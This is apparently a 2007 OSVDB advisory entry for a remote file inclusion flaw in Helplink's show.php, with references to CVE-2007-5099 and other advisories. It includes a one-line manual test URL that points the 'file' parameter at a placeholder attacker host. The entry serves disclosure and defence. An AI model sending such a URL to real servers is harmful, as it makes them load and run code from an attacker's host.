Helplink show.php file Variable Remote File Inclusion

2007-09-23T00:00:00
ID OSVDB:37225
Type osvdb
Reporter OSVDB
Modified 2007-09-23T00:00:00

Description

Manual Testing Notes

http://[target]/show.php?file=[attacker]

References:

Secunia Advisory ID:26910 Other Advisory URL: http://milw0rm.com/exploits/4448 FrSIRT Advisory: ADV-2007-3253 CVE-2007-5099 Bugtraq ID: 25782